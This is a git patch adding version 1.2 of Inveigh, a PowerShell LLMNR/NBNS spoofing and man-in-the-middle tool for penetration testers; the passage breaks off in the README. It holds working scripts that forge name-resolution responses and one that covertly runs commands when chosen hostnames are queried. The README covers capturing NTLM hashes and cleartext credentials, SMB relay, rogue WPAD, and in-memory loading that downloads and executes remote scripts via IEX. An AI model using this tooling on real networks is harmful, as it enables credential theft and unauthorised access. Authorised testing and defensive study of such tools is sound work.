From 73e2f3d442fc63925fa79a980fbce9d5c8a571af Mon Sep 17 00:00:00 2001 From: Kevin Robertson Date: Tue, 13 Sep 2016 18:58:15 -0400 Subject: [PATCH] Inveigh 1.2 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 1. Added Inveigh-Unprivileged.ps1 (replaces Inveigh-BruteForce.ps1) – This script contains only LLMNR/NBNS spoofing and hash capture methods that do not require local admin access. The NBNS spoofer can be used without disabling the local NBNS service. The LLMNR spoofer does require stopping (needs admin) the local service and freeing up port 5355. It will work without admin on a system with LLMNR disabled. Note that there can still be systems configurations that will prevent Inveigh-Unprivileged from working, and require admin access to change (e.g. local firewall blocking traffic, LLMNR enabled). This script replaces Inveigh-BruteForce and contains the same functionality. 2. Inveigh.ps1 Updates - Added a learning mode (SpooferLearning parameter) to Invoke-Inveigh that will attempt to avoid spoofing requests for valid hostnames. If enabled, Inveigh will send out LLMNR/NBNS requests for hostnames received through incoming LLMNR/NBNS requests. If Inveigh receives a response for a sent requests, it will add the hostname to a blacklist. Added some some code to help keep track or the SMB capture sequence. Removed the ability to launch Invoke-InveighRelay directly from an Invoke-Inveigh command line. 3. Inveigh-Relay.ps1 Status - This one is due for an overhhaul. I'm also considering trying to convert it to not require admin access. No real changes on this pass though. It will work with either Invoke-Inveigh (-HTTP N and/or -HTTPS N) or Invoke-InveighUnprivileged (-HTTP N) as long as the target system supports SMB1. 4. Support Functions - Merged all of the small Get functions into Get-Inveigh. 5. Extras – Added an extras directory for functions that don’t fit the main scripts. a. Send-NBNSResponse – This function sends a crafted NBNS response packet to a specific target. For name resolution to be successful, the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been able to get it to work manually by watching tshark with the the transaction ID being listed in the output. Ideally, this function would be fed by another script. b. Send-LLMNResponse – Just like Send-NBNSResponse but even harder to use manually. c. Invoke-NBNSC2 - Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be sent from a NBNS enabled system on the same subnet using ping, etc. --- Extras/Invoke-NBNSC2.ps1 | 151 ++ Extras/Send-LLMNRResponse.ps1 | 87 ++ Extras/Send-NBNSResponse.ps1 | 105 ++ Inveigh.psm1 | 4 +- README.md | 293 ++-- Scripts/Inveigh-Relay.ps1 | 1177 +++++++-------- Scripts/Inveigh-Unprivileged.ps1 | 2364 ++++++++++++++++++++++++++++++ Scripts/Inveigh.ps1 | 1653 ++++++++++++--------- 8 files changed, 4400 insertions(+), 1434 deletions(-) create mode 100644 Extras/Invoke-NBNSC2.ps1 create mode 100644 Extras/Send-LLMNRResponse.ps1 create mode 100644 Extras/Send-NBNSResponse.ps1 create mode 100644 Scripts/Inveigh-Unprivileged.ps1 diff --git a/Extras/Invoke-NBNSC2.ps1 b/Extras/Invoke-NBNSC2.ps1 new file mode 100644 index 0000000..41d2e64 --- /dev/null +++ b/Extras/Invoke-NBNSC2.ps1 @@ -0,0 +1,151 @@ +function Invoke-NBNSC2 +{ +<# +.SYNOPSIS +Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are +received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be +sent from a NBNS enabled system on the same subnet using ping, etc. + +.PARAMETER Hostnames +A comma separated list of Hostnames that will trigger a corresponding command. The first hostname trigger a command +from the Commands array with a matching index (e.g. Hostnames[0] executes Commands[0]). + +.PARAMETER Commands +An array of commands stored in scriptblock format. All commands must be enclosed in {} brackets. + +.PARAMETER ExitHostname +Specify a hostname that will cause the function to exit. This hostname must not match a hostname used in Hostnames. + +.PARAMETER RunTime +(Integer) Set the run time duration. + +.PARAMETER RunTimeUnit +Default = Minutes: Set the time unit for RunTime to either Minutes, Hours, or Days. + +.EXAMPLE +Send-NBNSC2 -Hostnames test1,test2 -Command {calc},{notepad} -RunTime 1 -RunTimeUnit Days + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + +[CmdletBinding()] +param +( +[parameter(Mandatory=$true)][Array]$Hostnames = "", +[parameter(Mandatory=$true)][Array]$Commands = "", +[parameter(Mandatory=$true)][String]$ExitHostname = "", +[parameter(Mandatory=$false)][Int]$RunTime="", +[parameter(Mandatory=$false)][ValidateSet("Minutes","Hours","Days")][String]$RunTimeUnit="Minutes", +[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} + +if($Hostnames.Count -ne $Commands.Count) +{ + throw "Must use an equal number of Hostnames and Commands." +} +elseif($Hostnames -contains $ExitHostname) +{ + throw "ExitHostname cannot be used as in Hostnames." +} + +if($RunTime) +{ + if($RunTimeUnit -like 'Minutes') + { + $runtime_timeout = new-timespan -Minutes $RunTime + } + elseif($RunTimeUnit -like 'Hours') + { + $runtime_timeout = new-timespan -Hours $RunTime + } + elseif($RunTimeUnit -like 'Days') + { + $runtime_timeout = new-timespan -Days $RunTime + } + + $runtime_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() +} + +$Hostnames = $Hostnames | % {$_.ToUpper()} +$running = $true +$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137) +$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 +$NBNS_UDP_client.Client.ReceiveTimeout = 10000 +$control_timeout = new-timespan -Seconds 1 +$control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + +while($running) +{ + try + { + $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) + } + catch + { + $NBNS_request_data = $null + } + + if($NBNS_request_data) + { + $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)]) + $NBNS_query = $NBNS_query -replace "-00","" + $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) + $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) + $NBNS_query_string_subtracted = "" + $NBNS_query_string = "" + $n = 0 + + if($NBNS_query_string_encoded.Length -gt 1) + { + do + { + $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65) + $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16)) + $n += 1 + } + until($n -gt ($NBNS_query_string_encoded.Length - 1)) + + $n = 0 + + do + { + $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16))) + $n += 2 + } + until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) + } + + if([Array]::IndexOf($Hostnames,$NBNS_query_string) -ge 0 -and $control_stopwatch.Elapsed -ge $control_timeout) + { + $NBNS_UDP_client.Close() + $command_index = [Array]::IndexOf($Hostnames,$NBNS_query_string) + $NBNS_query_string = '' + & $Commands[$command_index] + $control_timeout = new-timespan -Seconds 5 + $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 10000 + } + elseif($ExitHostname -like $NBNS_query_string) + { + $running = $false + } + } + + if($RunTime -and $runtime_stopwatch.Elapsed -ge $runtime_timeout) + { + $running = $false + } + +} + +$NBNS_UDP_client.Close() + +} \ No newline at end of file diff --git a/Extras/Send-LLMNRResponse.ps1 b/Extras/Send-LLMNRResponse.ps1 new file mode 100644 index 0000000..cc22091 --- /dev/null +++ b/Extras/Send-LLMNRResponse.ps1 @@ -0,0 +1,87 @@ + +function Send-LLMNRResponse +{ +<# +.SYNOPSIS +Send-LLMNRResponse sends a crafted LLMNR response packet to a specific target. For name resolution to be successful, +the specified TargetIP, TargetPort, Hostname, and TransactionID must match a very (very very) recent LLMNR request. +You must have an external method (wireshark,etc) of viewing the required LLMNR request fields for traffic on the +target subnet. The odds of pulling this attack off manually are slim if not impossible due to the narrow response +window. Ideally, this function would be fed by another script. + +.PARAMETER Hostname +Default = WPAD: Specify a hostname for NBNS spoofing. + +.PARAMETER LLMNRTTL +Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. + +.PARAMETER SendPort +Default = Random Available: Specify a source port for the LLMNR response. Note that the standard port is 5355 +which will cause a binding conflict if LLMNR is enabled on the host system. A random port seems to work fine. + +.PARAMETER SpooferIP +Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system +other than the function host. + +.PARAMETER TargetIP +Specify an IP address to target for the LLMNR response. + +.PARAMETER TargetPort +Specify an port to target for the LLMNR response. This port must match the source port included in the request. + +.EXAMPLE +Send-LLMNRResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + + +[CmdletBinding()] +param +( +[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", +[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="", +[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="", +[parameter(Mandatory=$true)][String]$Hostname = "", +[parameter(Mandatory=$true)][Int]$TargetPort="", +[parameter(Mandatory=$false)][Int]$SendPort="0", +[parameter(Mandatory=$false)][Int]$LLMNRTTL="30", +[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} + +if(!$SpooferIP) +{ + $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) +} + +$hostname_bytes = [System.Text.Encoding]::UTF8.GetBytes($Hostname) +$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) +[Array]::Reverse($LLMNR_TTL_bytes) +$Transaction_ID_encoded = $TransactionID.Insert(2,'-') +$Transaction_ID_bytes = $Transaction_ID_encoded.Split('-') | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + +$LLMNR_response_packet = $Transaction_ID_bytes + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $hostname_bytes.Count + + $hostname_bytes + + 0x00,0x00,0x01,0x00,0x01 + + $hostname_bytes.Count + + $hostname_bytes + + 0x00,0x00,0x01,0x00,0x01 + + $LLMNR_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + +$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort) +$destination_IP = [System.Net.IPAddress]::Parse($TargetIP) +$destination_point = New-Object Net.IPEndpoint($destination_IP,$TargetPort) +$send_socket.Connect($destination_point) +$send_socket.Send($LLMNR_response_packet,$LLMNR_response_packet.Length) +$send_socket.Close() +} \ No newline at end of file diff --git a/Extras/Send-NBNSResponse.ps1 b/Extras/Send-NBNSResponse.ps1 new file mode 100644 index 0000000..3d5ed02 --- /dev/null +++ b/Extras/Send-NBNSResponse.ps1 @@ -0,0 +1,105 @@ + +function Send-NBNSResponse +{ +<# +.SYNOPSIS +Send-NBNSResponse sends a crafted NBNS response packet to a specific target. For name resolution to be successful, +the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must +have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target +subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been +able to get it to work manually by watching tshark with the the transaction ID being listed in the output. +Ideally, this function would be fed by another script. + +.PARAMETER Hostname +Default = WPAD: Specify a hostname for NBNS spoofing. + +.PARAMETER NBNSTTL +Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. + +.PARAMETER SendPort +Default = 137: Specify a source port for the NBNS response. + +.PARAMETER SpooferIP +IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system +other than the function host. + +.PARAMETER TargetIP +IP address to target for the NBNS response. + +.PARAMETER TransactionID +NBNS transaction ID that matches the transaction from the NBNS request. + +.EXAMPLE +Send-NBNSResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + + +[CmdletBinding()] +param +( +[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", +[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="", +[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="", +[parameter(Mandatory=$true)][String]$Hostname = "", +[parameter(Mandatory=$false)][Int]$SendPort="137", +[parameter(Mandatory=$false)][Int]$NBNSTTL="165", +[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} + +if(!$SpooferIP) +{ + $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) +} + +$Hostname = $Hostname.ToUpper() + +$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, + 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 + +$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname) +$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) +$hostname_encoded = $hostname_encoded.Replace("-","") +$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) +$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) +[Array]::Reverse($NBNS_TTL_bytes) +$Transaction_ID_encoded = $TransactionID.Insert(2,'-') +$Transaction_ID_bytes = $Transaction_ID_encoded.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + +for($i=0; $i -lt $hostname_encoded.Count; $i++) +{ + + if($hostname_encoded[$i] -gt 64) + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 10 + } + else + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 17 + } + +} + +$NBNS_response_packet = $Transaction_ID_bytes + + 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + +$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort) +$destination_IP = [System.Net.IPAddress]::Parse($TargetIP) +$destination_point = New-Object Net.IPEndpoint($destination_IP,137) +$send_socket.Connect($destination_point) +$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length) +$send_socket.Close() +} \ No newline at end of file diff --git a/Inveigh.psm1 b/Inveigh.psm1 index 3e0cf7e..1e76490 100644 --- a/Inveigh.psm1 +++ b/Inveigh.psm1 @@ -1,10 +1,10 @@ <# .SYNOPSIS -Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP(S)/SMB and NTLMv2 HTTP to SMB relay. +Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool. .LINK https://github.com/Kevin-Robertson/Inveigh #> Import-Module $PWD\Scripts\Inveigh.ps1 -Import-Module $PWD\Scripts\Inveigh-BruteForce.ps1 +Import-Module $PWD\Scripts\Inveigh-Unprivileged.ps1 Import-Module $PWD\Scripts\Inveigh-Relay.ps1 \ No newline at end of file diff --git a/README.md b/README.md index 46afa85..f116581 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,42 @@ # Inveigh Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool designed to assist penetration testers that find themselves limited to a Windows system. -## Functions +## Included In +* PowerShell Empire - https://github.com/PowerShellEmpire/Empire +* PS>Attack - https://github.com/jaredhaight/psattack +* p0wnedShell - https://github.com/Cn33liz/p0wnedShell + +## Special Thanks +* Anyone that posted .NET packet sniffing examples. +* Responder - https://github.com/SpiderLabs/Responder +* Impacket - https://github.com/CoreSecurity/impacket + +## Import +* To import with Import-Module: + Import-Module ./Inveigh.psd1 + +* To import using the dot source method: + . ./Inveigh.ps1 + . ./Inveigh-BruteForce.ps1 + . ./Inveigh-Relay.ps1 + +* To load into memory using Invoke-Expression: + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Unprivileged.ps1") + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1") + +## System Requirements +* Tested minimums are PowerShell 2.0 and .NET 3.5 + +## Functions +* Invoke-Inveigh +* Invoke-InveighUnprivileged +* Invoke-InveighRelay +* Clear-Inveigh +* Get-Inveigh +* Stop-Inveigh +* Watch-Inveigh + ### Invoke-Inveigh * The main Inveigh LLMNR/NBNS spoofer function. @@ -20,101 +55,146 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design ##### Notes: * LLMNR/NBNS spoofing is performed by packet sniffing and responding through raw sockets. * SMB challenge/response captures are performed by sniffing over the host system's SMB service. +* The local LLMNR/NBNS services do not need to be disabled on the host system. +* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. +* Ensure that any needed LMMNR, NBNS, SMB, HTTP, HTTPS ports are open within any local firewall on the host system. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. + +##### Examples: +* To execute with default settings: + Invoke-Inveigh + +* To load and execute with one line: + Import-Module ./Inveigh.ps1;Invoke-Inveigh + +* To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled. + Invoke-Inveigh -ConsoleOutpuy Y -FileOutput Y -NBNS Y + +##### Screenshot: +![inveigh](https://cloud.githubusercontent.com/assets/5897462/18420523/924f9c7a-7842-11e6-984e-153058b28016.png) ##### Parameters: -* __IP__ - Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. -* __SpooferIP__ - Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. -* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. +* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. +* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. +* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning. * __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. * __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. * __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. +* __SpooferLearning__ - Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the hostname to a spoofing blacklist. The valid system must respond to the protocol type that matches the protocol of the original request in order to be blacklisted. +* __SpooferLearningDelay__ - (Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning. +* __SpooferLearningInterval__ - Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled. * __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. -* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. -* __LLMNRTTL__ - Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet. -* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. -* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. +* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. +* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet. +* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. +* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. * __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. * __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. -* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. -* __HTTPDir__ - Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. -* __HTTPDefaultFile__ - Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. -* __HTTPDefaultEXE__ - Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. -* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. -* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate. -* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server. +* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. +* __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. +* __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. +* __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. +* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. +* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate. +* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. +* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. * __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. -* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. -* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. +* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. +* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. * __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. -* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. +* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. * __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. -* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __SMBRelay__ - Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory. -* __SMBRelayTarget__ - IP address of system to target for SMB relay. -* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. -* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. -* __SMBRelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. -* __SMBRelayNetworkTimeout__ - Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. +* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. * __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. -* __ConsoleStatus__ - Default = Disabled: (Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. +* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. * __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. * __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire -### Invoke-InveighBruteForce -* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell. +### Invoke-InveighUnprivileged +* Inveigh LLMNR/NBNS spoofer function that does not require local administrator access. ##### Privilege Requirements: * Regular User ##### Features: +* IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service +* IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled * Targeted IPv4 NBNS brute force spoofer with granular control * NTLMv1/NTLMv2 challenge/response capture over HTTP +* Basic auth cleartext credential capture over HTTP +* WPAD server capable of hosting a basic or custom wpad.dat file +* HTTP server capable of hosting limited content * Granular control of console and file output * Run time control -##### Notes: -* Microsoft released patches in June 2016 that will likely prevent some of this function's features from working. +##### Notes: +* The local NBNS service does not need to be disabled on the host system. +* Ensure that any needed LMMNR, NBNS, HTTP ports are open within any local firewall on the host system. +* Migrating/injecting into a process that has already been allowed incoming/outgoing firewall access should also work. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. +* Microsoft released patches in June 2016 that will likely prevent some of this function's brute force features from working the way they did before June. + +##### Examples: +* To execute with default settings: + Invoke-InveighUnprivileged + +* To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes. + Invoke-InveighUnprivileged -ConsoleOutpuy Y -FileOutput Y -RunTime 30 + +##### Screenshot: +![inveigh-unprivileged](https://cloud.githubusercontent.com/assets/5897462/18420530/a6645a02-7842-11e6-8d2c-bd5ff04813fe.png) ##### Parameters: -* __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host. -* __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing. -* __Hostname__ - Default = 